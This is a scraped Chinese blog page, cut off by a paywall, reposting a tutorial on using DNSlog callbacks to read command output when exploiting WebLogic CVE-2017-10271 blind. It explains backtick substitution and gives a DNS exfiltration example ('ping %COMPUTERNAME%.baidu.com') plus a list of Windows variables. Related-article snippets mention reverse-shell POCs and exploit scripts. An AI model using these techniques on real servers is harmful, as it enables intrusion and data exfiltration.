利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果

最新推荐文章于 2024-08-06 19:58:20 发布
最新推荐文章于 2024-08-06 19:58:20 发布
阅读量928 收藏 2
点赞数
文章标签: 操作系统 java shell
原文链接:http://www.cnblogs.com/ichunqiu/p/8137025.html
版权
本文讲述了如何利用DNSlog回显技术处理Weblogic(CVE-2017-10271)漏洞,当目标系统不回显命令结果时,通过Linux的反引号执行命令并结合Windows下的变量大全,将结果编码避免空格问题。最后,提到了在遇到命令中有空格的情况时,通过base64编码和替换空格为-的方法来解决。
摘要由CSDN通过智能技术生成

作者:Armyzer0

 

Weblogic(CVE-2017-10271) 漏洞出来以后又是一波血雨腥风,正好我昨天测试的时候发现了一个存在这个漏洞的weblogic,但是他不回显咋办呢!让他返回执行结果集到dnslong首先大家先了解下 “ 这个符号在Linux的作用!

符号:` `
名称:反引号,上分隔符
位置:反引号(`)这个字符一般在键盘的左上角,数字1的左边,不要将其同单引号(’)混淆
作用:反引号括起来的字符串被shell解释为命令行,在执行时,shell首先执行该命令行,并以它的标准输出结果取代整个反引号(包括两个反引号)部分

1.png

` ` 里面的内容是当做命令来执行

还有一些其他符号也可以产生同样的效果我就不一一介绍了

然后我们在来说下Windows 下的

2.png

ping %COMPUTERNAME%.baidu.com  [/size][/align]
[align=left][size=3]%COMPUTERNAME% 是一个变量,得到计算机名[/size][/align]
[align=left][size=3]%ALLUSERSPROFILE% : 列出所有用户Profile文件位置。 
%APPDATA% :  列出应用程序数据的默认存放位置。 
%CD% :  列出当前目录。 
%CLIENTNAME% :  列出联接到终端服务会话时客户端的NETBIOS名。 
%CMDCMDLINE% :  列出启动当前cmd.exe所使用的命令行。 
%CMDEXTVERSION% :  命令出当前命令处理程序扩展版本号。 
%CommonProgramFiles% :  列出了常用文件的文件夹路径。 
%COMPUTERNAME% :  列出了计算机名。  
%COMSPEC% :  列出了可执行命令外壳(命令处理程序)的路径。 
%DATE% :  列出当前日期。 
%
最低0.47元/天 解锁文章
dfdhxb995397
关注
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1868
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
使用DNSLog进行盲打
谢公子的博客
04-28 6076
在渗透测试中,SQL盲注、命令盲注等漏洞是较难利用的,由于无回显,这类漏洞即使存在也显得有些鸡肋。针对此类问题,我们可以使用DNSLOG来进行突破。DNSLOG是一种回显机制,使用者可以通过DNS解析日志来读取漏洞回显。 参考文章:使用DNSLOG拯救你的盲打盲注 ...
weblogic未授权访问命令执行复现(cve-2020-14882)
来到了学渣的博客
11-01 4716
最近的weblogic漏洞很火,直接上手复现一波。也踩了很多坑,比如用docker搭建环境的时候,用不回显payload的话,如何执行命令(所以用有回显的payload是最舒服的最直观的) 漏洞版本主要影响到 Oracle WebLogic Server 版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。 版本12.2.1.3 先执行下现有的payload,可以直接未授权面板 ip/console/images/%252E%252E%252Fconsole.p
weblogic CVE 2017-10271
ChenD的学习笔记
05-22 2160
将输出重定向到当前循环的Branding_Login_WeblogicConsole.gif文件的同级目录下的pwd.txt文件,因为可以访问到该图片,所以能访问到创建的文件。这里随便找一个可访问的文件,访问192.168.27.128:7001/console,进入到登陆页面,右键查看源代码,随便找一个图片或文件的链接,这就搞到了可访问的文件名。这条命令的意思是,找到所有叫Branding_Login_WeblogicConsole.gif的文件,循环读取,每次循环 执行 id;ifconfig命令
24、25-反序列化漏洞(JBoss、apache log4、apache Shiro、JWT)Weblogic未授权访问、代码执行、任意上传
XLbb的博客
05-16 1873
serialize() 和 unserialize() 在 PHP内部实现上是没有漏洞的,之所以会产生反序列化漏洞是因为应用程序在处理对象、魔术函数以及序列化相关问题的时候导致的。 当传给 unserialize() 的参数可控时,那么用户就可以注入精心构造的 payload。当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。 CVE-2021-2109Weblogic Server远程代码执行。apache log4j (Java日志记录库)
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
m0_66299232的博客
04-12 671
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。5.因为执行whoami是无回显的,所以需要借助dnslog.cn网站进行回显
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: ...
Weblogic XMLDecoder 反序列化漏洞复现(CVE-2017-10271
DaWan
09-21 1233
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271)环境搭建漏洞验证反弹shellPOC上传文件POC 环境搭建 使用vulhub进行环境搭建,具体步骤可参考这里。 启动成功 漏洞验证 访问http://IP:PORT/wls-wsat/CoordinatorPortType11,在挖洞的时候访问此地址出现如下页面则大概率都是存在这个漏洞的 反弹shellPOC POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: X.X.
中间件Weblogic管理监控注意事项
小江湖
12-09 2175
Weblogic监控的目的:发现系统中的隐患及系统运行是否稳定。主要从以下几方面进行检查: 一、操作系统: 检查系统cpu、内存等使用是否异常。如在负载不大的情况下,cpu是否一直居高不下,内存占用是否一直很大。可以通过top(topas)、vmstat、free –m、ps等命令查看。 如果r经常大于4,且id经常少于40,表示cpu的负荷很重。 如果pi,po长期不等于0,表示内存不足。 如果disk经常不等于0,且在b中的队列大于3,表示io性能不好。 1...
Weblogic GetShll&CMD;漏洞检测利用工具.rar
08-20
渗透测试中使用,可以用于检测weblogic漏洞执行CMD命令,获取服务器权限,本程序仅供检测和学习用途,请勿用于其他任何非法用途!
Weblogic漏洞扫描工具
02-22
console 页面探测 & 弱口令扫描、uuid页面的SSRF、CVE-2017-10271 wls-wsat页面的反序列化、CVE-2018-2628 反序列化等功能。
WebLogic】使用NodeManager跨服务器启动WebLogic集群节点的完整日志(原创)
cnskylee的博客
03-09 2733
Oracle WebLogic服务器真正意义上的集群构成: 通过控制台和节点管理器,实现 <2021-3-9 下午04时53分45秒 CST> <INFO> <NodeManager> <Starting WebLogic server with command line: /app/domains/myclusterdomain/bin/startWebLogic.sh > <2021-3-9 下午04时53分45秒 CST> <F
Weblogic漏洞利用总结
YouthBelief的博客
10-28 6640
weblogic前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np imp
weblogic使用jdk7u21 gadget以及回显
公众号shadow sock7
09-03 869
参考: https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Jdk7u21.java Java 反序列化漏洞始末(2)— JDK 条件: jdk < = 7u21 Weblogic与jdk的兼容性问题 好像10.3.6不支持jdk 1.8,不过好像可以先用jdk 6,7安装之后然后bypass。 https://stackoverflow.com/questions/22513660/
poc weblogic 漏洞利用_Weblogic Cohence反序列化RCE分析利用
weixin_39851918的博客
12-10 284
在对Java Web应用程序进行研究时,不安全的反序列化漏洞已经成为了攻击者或研究人员的常见目标了。这些漏洞将导致他人在目标设备上可靠地实现远程代码执行,而且这类漏洞通常很难修复。2020年3月6日Weblogic公开了该漏洞,这是一个严重漏洞,CVSS评分为9.8,该漏洞将影响Oracle Coherence库,而这个库在Oracle WebLogic Server等流行产品中都有广泛使用。此次...
漏洞复现】WebLogic中间件漏洞
最新发布
qq_48368964的博客
08-06 1141
WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。
深入浅出带你学习weblogic中间件常见漏洞
小陈的博客
02-16 493
WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。可以看到WEBLOGIC的作用还是非常大的,它的特点可以概括为下面五个点:1.标准性,支持多种标准。2.可扩展性,集群能力强。3.开发快,可以快速部署。4.灵活性强。5.可靠性强,安全性高。下面展开来讲weblogic中间件常见的漏洞以及利用方法。
【渗透测试】Weblogic系列漏洞
weixin_53972936的博客
11-01 3637
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
在MSF工具中用search命令搜索CVE-2019-0708漏洞利用模块,将回显结果中的漏洞公开时间作为Flag值(如:2017-10-16)命令
05-30
您可以在Metasploit中使用以下命令来搜索CVE-2019-0708漏洞利用模块: ``` search cve-2019-0708 ``` 回显结果中的漏洞公开时间是2019-05-14,因此Flag值为:2019-05-14。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值